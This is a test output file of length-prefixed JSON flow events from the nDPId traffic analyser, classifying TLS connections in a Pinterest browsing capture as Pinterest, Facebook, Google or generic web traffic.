-00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289720502,"flow_last_seen":1605289720592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38402,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289722610,"flow_last_seen":1605289722642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38406,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
-00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
-00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
-00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
-00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 
-00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00671{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00615{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00747{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":171,"flow_first_seen":1605289715782,"flow_last_seen":1605289724655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":150127,"flow_avg_l4_payload_len":877,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f11f:83:face:b00c::25de","src_port":60340,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2804,"flow_first_seen":1605289713743,"flow_last_seen":1605289734948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13624,"flow_tot_l4_payload_len":3671715,"flow_avg_l4_payload_len":1309,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1605289714658,"flow_last_seen":1605289714873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":7307,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}} 
-00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1605289714590,"flow_last_seen":1605289716476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":38980,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289728586,"flow_last_seen":1605289728804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2003","src_port":48890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::200a","src_port":57130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 